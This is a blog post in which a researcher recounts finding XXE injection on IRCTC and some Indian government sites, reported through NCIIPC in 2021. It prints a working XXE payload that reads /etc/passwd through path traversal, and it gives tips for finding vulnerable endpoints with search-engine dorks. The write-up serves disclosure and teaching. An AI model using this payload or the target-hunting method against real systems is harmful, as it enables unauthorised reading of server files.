Exploiting IRCTC along with few other government domains through XXE

In this blog, I would be giving an Insight about XXE(XML External Entity) injection and a practical attack case study where I did Responsible Disclosures to Indian Government through NCIIPC back in 2021.

Why does an XXE attack persist in a Web Application or any other Software which has an XML parser? XXE is not an issue that can be resolved in XML, rather it's a misconfiguration that is not handled while defining the XML parser, thus due to the weak configuration of the XML parser Web Applications are exploited which accepts XML data from the user.

To get a detailed insight into how what, and why XXE is refer to the following articles to get the same, PortSwigger, OWASP, Acunetix.

Back in 2021 when there the news around the Internet that multiple company data got breached and all, So I thought its time to defend all this before its too late for some other company to get compromised. For this, I choose our own government domains to secure and also have a responsible disclosure policy through which we can report any security issues having an impact to the Confidentiality and Integrity of the website.

So I came across this XXE while looking for some issues on a private program and thought if this thing is present here then it can also be present on multiple domains on the Internet. Thus to discover the same technology I used multiple methods like Google dork and multiple search engines like DuckDuckGo, Yandex, Bing, Yahoo. So after a few trials and error, I got some gov domains plus the IRCTC website having the same configurations and tried the exploit on all for which only a few of them were exploitable which included the IRCTC domain.

Basically, XXE is present where user input is accepted and formatted at the backend to retrieve the output back to the user, also there are some common error-based XXE which on injecting the malicious XXE payload throws the error along with the requested data.

After going through multiple resources over the internet and referring the Payload all things syntax for XXE, I was not able to fetch the file:///etc/passwd data and later on trying few trial and error methods finally I was able to get the exploit code working by backtracing the path.

Proof of Concept:

Exploit Code:

<!DOCTYPE xxe [<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:./../../../../../etc/passwd" >
]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
 <Request>
 <EMailAddress>swap@test.com</EMailAddress>
 <AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
 </Request>
</Autodiscover>

So using the above exploit we are now able to fetch the system files which is enough to demonstrate the Vulnerability and without any further delay I created bunch of submissions to NCIIPC later which also got acknowledged by the team within a week. Also all this reports where sent back in between Feb-Mar 2021 which are all now fixed by the NCIIPC team.

Acknowledgements for Responsible Disclosure

Thus the Conclusion to the above case study depicts that user inputs should never be trusted in any case because most of the Vulnerabilities arise from the Client side which can lead to critical issues hence keeping this in mind the SDLC should have some strict restrictions on configuration of the XML parser while defining/bulding the feature that injests user input to provide the services.

Key Takeaways

Look around the workflow of the web application and try to check if you can manipulate the request by changing the Content-Type Json to XML and see the results. Try to change the request method. Use back tracing or directory traversal method. In most cases Vulnerable endpoints for this attack can be login workflows, Data request endpoints, downloading/processing or conversion of data from one format to another.

I hope this case study helps to better understand the Attack vectors and the Impacts of the exploitation if proper care is not taken at the ground level of the SDLC, Thanks to all of you who are reading this and I assume that this writeup helps to better understand this vulnerability class to all those who have’nt figured out this yet.

Stay updated with me on Twitter for more interesting blogs.